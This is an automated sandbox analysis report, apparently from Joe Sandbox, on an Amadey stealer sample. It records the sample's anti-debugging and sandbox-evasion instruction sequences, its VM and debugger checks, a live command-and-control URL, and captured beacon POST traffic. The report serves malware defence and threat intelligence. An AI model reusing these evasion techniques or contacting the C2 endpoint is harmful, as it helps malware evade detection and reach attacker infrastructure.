Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543028E second address: 5430294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490CDA second address: 5490D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A7h 0x00000005 mov esi, 3B3E9733h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F4688C1B776h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F4688C1B770h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d jmp 00007F4688C1B770h 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B76Eh 0x0000002c add cx, 4CC8h 0x00000031 jmp 00007F4688C1B76Bh 0x00000036 popfd 0x00000037 mov ah, 22h 0x00000039 popad 0x0000003a push 5DF8A268h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C1B777h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490D68 second address: 5490D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5DF9A26Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929DDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490D9B second address: 5490DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490DDF second address: 5490DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440501 second address: 5440505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440505 second address: 544050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544050B second address: 544056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C1B770h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F4688C1B770h 0x00000017 push 09B2C9E3h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4688C1B76Dh 0x00000025 or ax, 3506h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544056E second address: 54405B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 7F4B09FBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C929DDh 0x00000018 and cx, 7D16h 0x0000001d jmp 00007F4688C929E1h 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edi, ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54405B4 second address: 54405FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007F4688C1B769h 0x0000000f jmp 00007F4688C1B770h 0x00000014 push eax 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4688C1B76Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54405FB second address: 5440618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440618 second address: 544061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544061F second address: 544065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b call 00007F4688C929DBh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 call 00007F4688C929E6h 0x00000017 push eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544065B second address: 544065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544065F second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440665 second address: 54406A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F4688C1B770h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B777h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406A9 second address: 54406AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406AF second address: 54406B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406B3 second address: 544078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 pushfd 0x00000016 jmp 00007F4688C929DDh 0x0000001b or al, FFFFFFC6h 0x0000001e jmp 00007F4688C929E1h 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007F4688C929DEh 0x0000002b sub esp, 1Ch 0x0000002e pushad 0x0000002f pushad 0x00000030 mov cl, 1Ch 0x00000032 pushfd 0x00000033 jmp 00007F4688C929E9h 0x00000038 sub cx, 4586h 0x0000003d jmp 00007F4688C929E1h 0x00000042 popfd 0x00000043 popad 0x00000044 pushfd 0x00000045 jmp 00007F4688C929E0h 0x0000004a add cx, 8828h 0x0000004f jmp 00007F4688C929DBh 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F4688C929E6h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544078C second address: 5440792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440792 second address: 54407E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4688C929E6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F4688C929E6h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F4688C929DCh 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54407E9 second address: 54407F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bl 0x00000008 popad 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54407F8 second address: 5440837 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 34ED4AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4688C929E5h 0x00000014 adc eax, 5B01D476h 0x0000001a jmp 00007F4688C929E1h 0x0000001f popfd 0x00000020 mov ch, 0Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440837 second address: 5440854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B779h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440854 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F4688C929DDh 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 jmp 00007F4688C929DEh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b pushad 0x0000001c mov eax, 544A8F7Dh 0x00000021 call 00007F4688C929DAh 0x00000026 push eax 0x00000027 pop edi 0x00000028 pop ecx 0x00000029 popad 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4688C929DFh 0x00000035 jmp 00007F4688C929E3h 0x0000003a popfd 0x0000003b push ecx 0x0000003c pop edx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54408C0 second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F4688C1B76Ch 0x0000000c sub esi, 3667A318h 0x00000012 jmp 00007F4688C1B76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 363775 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 38FF78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 3F3B3C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 1093775 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 10BFF78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 1123B3C instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Code function: 0_2_05490C90 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Window / User API: threadDelayed 364

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8184	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep time: -10920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5924	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8176	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep time: -30000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000007.00000002.2880581504.0000000000729000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: gNo9ad9KO4.exe, 00000000.00000002.1680292366.0000000000344000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1706138398.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1720919181.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Code function: 0_2_05490C90 rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00EC643B mov eax, dword ptr fs:[00000030h]		7_2_00EC643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ECA1A2 mov eax, dword ptr fs:[00000030h]		7_2_00ECA1A2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: yHProgram Manager

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00EAD2E8 cpuid

7_2_00EAD2E8

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation

Yara detected Amadeys stealer DLL

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00EACAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_00EACAED

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00E96590 LookupAccountNameA,

7_2_00E96590

Stealing of Sensitive Information

Source: Yara match	File source: 7.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gNo9ad9KO4.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.91.77.82	unknown	Russian Federation		42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://77.91.77.82/Hun4Ko/index.php	true	24%, Virustotal, Browse Avira URL Cloud: phishing	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gNo9ad9KO4.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://77.91.77.82/Hun4Ko/index.php	Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: explorti.exe.8152.7.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://77.91.77.82/Hun4Ko/index.phpM	Virustotal: Detection: 22%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpT	Virustotal: Detection: 22%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpC	Virustotal: Detection: 23%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php	Virustotal: Detection: 24%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpa	Virustotal: Detection: 21%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpk	Virustotal: Detection: 21%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpW	Virustotal: Detection: 21%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php	Virustotal: Detection: 22%	Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpu	Virustotal: Detection: 21%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Virustotal: Detection: 51%

Multi AV Scanner detection for submitted file

Source: gNo9ad9KO4.exe

Virustotal: Detection: 51%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: gNo9ad9KO4.exe

Joe Sandbox ML: detected

Snort IDS alert for network traffic

Source: gNo9ad9KO4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Traffic

Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 77.91.77.82:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 77.91.77.82
Source: Malware configuration extractor	IPs: 77.91.77.82

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
